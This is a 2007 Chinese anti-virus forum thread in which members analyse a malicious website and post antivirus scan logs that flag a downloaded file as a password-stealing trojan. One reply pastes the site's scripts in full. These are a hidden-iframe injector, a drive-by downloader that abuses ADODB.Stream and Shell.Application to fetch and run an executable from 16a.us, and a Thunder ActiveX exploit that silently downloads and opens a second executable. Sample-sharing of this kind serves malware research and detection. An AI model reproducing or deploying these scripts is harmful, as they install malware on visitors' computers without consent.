查看: 2223|回复: 12
收起左侧

[病毒样本] 毒网

[复制链接]
virus007
发表于 2007-5-31 21:50:16 | 显示全部楼层 |阅读模式
http://www.zhaoxl.cn

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
tracydk
发表于 2007-5-31 21:52:04 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wangjay1980
发表于 2007-5-31 21:52:43 | 显示全部楼层
这个老点
detected: virus Virus.Win32.AutoRun.p        URL: http://bbs.kafan.cn/attachment.php?aid=79068//~Temp6014.exe//UPX
The EQs
发表于 2007-5-31 21:53:37 | 显示全部楼层
Scan performed at: 2007-5-31 21:53:40
Scanning Log
NOD32 version 2301 (20070531) NT
Command line: C:\Documents and Settings\EQ2\桌面\~Temp6014.rar
Operating memory - is OK

Date: 31.5.2007  Time: 21:53:44
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\~Temp6014.rar
C:\Documents and Settings\EQ2\桌面\~Temp6014.rar ?RAR ?~Temp6014.exe - probably a variant of Win32/PSW.Delf.NHI trojan
Number of scanned files: 2
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 21:53:44 Total scanning time: 0 sec (00:00:00)
icka
发表于 2007-5-31 21:54:10 | 显示全部楼层
  1. info =                "<script src="http://16a.us/oKK/JsT.js"></script>"        +"\n"+
  2.                 "<script>"        +"\n"+
  3.                 "function Start(){"        +"\n"+
  4.                 "var Then = new Date() "        +"\n"+
  5.                 "Then.setTime(Then.getTime() + 24*60*60*1000)"        +"\n"+
  6.                 "var cookieString = new String(document.cookie)"        +"\n"+
  7.                 "var cookieHeader = "Cookie1=" "        +"\n"+
  8.                 "var beginPosition = cookieString.indexOf(cookieHeader)"        +"\n"+
  9.                 "if (beginPosition != -1){ "        +"\n"+
  10.                 "} else "        +"\n"+
  11.                 "{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() "        +"\n"+
  12.                 "document.writeln("<iframe height=0 width=0 src=\\"http:\\/\\/16a.us\\/oKK\\/oKKT.asp\\"><\\/iframe>");"        +"\n"+
  13.                 "}"        +"\n"+
  14.                 "}"        +"\n"+
  15.                 "Start();"        +"\n"+
  16.                 "</script>"

  17. document.write(info)
复制代码
是不是那个大黑名单?


  1. document.writeln("<script>window.onerror=function(){return true;}<\/script>");
  2. document.writeln("<script>");
  3. document.writeln(" DZ=\'http://16a.us/oKK/smss.exe\';");
  4. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  5. document.writeln("function GnMs(n) ");
  6. document.writeln("{ ");
  7. document.writeln(" var numberMs = Math.random()*n;");
  8. document.writeln(" return \'~Temp\'+Math.round(numberMs)+\'.tmp\';");
  9. document.writeln("} ");
  10. document.writeln(" try ");
  11. document.writeln("{");
  12. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  13. document.writeln(" var Bf=document.createElement("object");");
  14. document.writeln(" Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");");
  15. document.writeln(" var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");");
  16. document.writeln(" var AS=Bf.CreateObject("Adodb.Stream","");");
  17. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  18. document.writeln(" AS.type=1;");
  19. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  20. document.writeln(" Kx.open("GET", DZ,0);");
  21. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  22. document.writeln(" Kx.send();");
  23. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  24. document.writeln(" Ns1=GnMs(9999);");
  25. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  26. document.writeln(" var cF=Bf.CreateObject("Scripting.FileSystemObject","");");
  27. document.writeln(" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);");
  28. document.writeln(" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");");
  29. document.writeln(" ok1=cF.BuildPath(NsTmp+\'\\system32\',\'cmd.exe\');");
  30. document.writeln(" q.SHeLLExecute(ok1,\' /c \'+Ns1,"","open",0);");
  31. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  32. document.writeln("} ");
  33. document.writeln(" catch(MsI) { MsI=1; }");
  34. document.writeln(" adgsdflkjgpgfdpo=\'\';");
  35. document.writeln("<\/script>")
复制代码



  1. <script>window.onerror=function(){return true;}</script>
  2. <SCRIPT>
  3. var boH1 = null;
  4. var OOwHUXqkg2 = 0;

  5. function init()
  6.     {
  7.     try
  8.         {
  9.         boH1 = new ActiveXObject("ThunderServer.webThunder.1")
  10.         }
  11.     catch (e)
  12.         {
  13.         return 0
  14.         }

  15.     return 1
  16.     }

  17. function downfile()
  18.     {
  19.     boH1["SetConfig"]("MessagePanel", "DownloadComplete", "0");
  20.     boH1["SetConfig"]("Sound", "DownloadComplete", "0");
  21.     boH1["ShowBrowserWindow"]();
  22.     var HwY_a3 = "http://16a.us/oKK/smss1.exe";
  23.     var V_WoijZC4 = "Temp.exe";
  24.     var TiVPJ5 = "c:\";
  25.     var SRVntkDAp6 = "";
  26.     var dkisBy7 = "";
  27.     var zb8 = 1;
  28.     var asnF9 = 0;
  29.     var sXpsYU10 = 5;
  30.     var pYoldJ11 = 0;
  31.     var ZPuTA12 = "";
  32.     var csASX13 = "";
  33.     var gkCsZrTn14 = "";
  34.     var PPkhBib15 = "";
  35.     var SGluFdn16 = 0;
  36.     var gIuWnHbni17 = "";
  37.     var qKs18 = boH1["AddTask"](HwY_a3,          V_WoijZC4,            TiVPJ5,      SRVntkDAp6,
  38.                                         dkisBy7,       zb8,            asnF9, sXpsYU10,
  39.                                         pYoldJ11, ZPuTA12,            csASX13,      gkCsZrTn14,
  40.                                         PPkhBib15,          SGluFdn16, gIuWnHbni17);
  41.     boH1["HideBrowserWindow"](1);
  42.     var _Y$TngwO22 = new window["Number"]();
  43.     var j23 = new window["String"]();
  44.     var jZPeXTI24 = new window["String"]();

  45.     if (qKs18["length"] > 0)
  46.         {
  47.         jZPeXTI24 = qKs18["split"]("{\r*\r}");
  48.         _Y$TngwO22 = window["parseInt"](jZPeXTI24[0]);
  49.         j23 = jZPeXTI24[1]
  50.         }

  51.     else
  52.         {
  53.         return 1
  54.         }

  55.     if (_Y$TngwO22 == 1)
  56.         return 1;

  57.     return j23
  58.     }

  59. function open()
  60.     {
  61.     boH1["OpenFile"](OOwHUXqkg2);
  62.     boH1["DeleteTask"](OOwHUXqkg2, true);
  63.     }

  64. function exec()
  65.     {
  66.     var cbEKfbd25 = init();

  67.     if (cbEKfbd25 == 0)
  68.         return;

  69.     OOwHUXqkg2 = downfile();
  70.     var aTzE26;

  71.     for (aTzE26 = 0; OOwHUXqkg2 == 1 && aTzE26 < 50; aTzE26++)
  72.         OOwHUXqkg2 = downfile();

  73.     if (OOwHUXqkg2 == 1)
  74.         return;

  75.     window["setTimeout"]("open()", 6000);
  76.     boH1["DeleteTask"](OOwHUXqkg2, del);
  77.     }
  78. exec();
  79. </SCRIPT>
复制代码

[ 本帖最后由 icka 于 2007-5-31 22:00 编辑 ]
taihuxian
发表于 2007-5-31 21:55:36 | 显示全部楼层
Virus: Virus.Win32.AutoRun.p

Virus found while downloading Web content.

Address: bbs.kafan.cn
风雪
发表于 2007-5-31 22:12:46 | 显示全部楼层
进入网站无反应。费尔扫描不报。
mofunzone
发表于 2007-5-31 22:56:04 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\~Temp6014.rar'
C:\Documents and Settings\morgan\My Documents\
  ~Temp6014.rar
    [0] Archive type: RAR
    --> ~Temp6014.exe
        [DETECTION] Contains signature of the dropper DR/Delphi.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
1p1
发表于 2007-5-31 23:05:09 | 显示全部楼层
原帖由 icka 于 2007-5-31 21:54 发表
info =                ""        +"\n"+
                ""        +"\n"+
                "function Start(){"        +"\n"+
                "var Then = new Date() "        +"\n"+
               ...


好久不见啊
icka
发表于 2007-5-31 23:31:46 | 显示全部楼层
原帖由 1p1 于 2007-5-31 23:05 发表


好久不见啊

一直潜水~~
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-12 19:05 , Processed in 0.131840 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表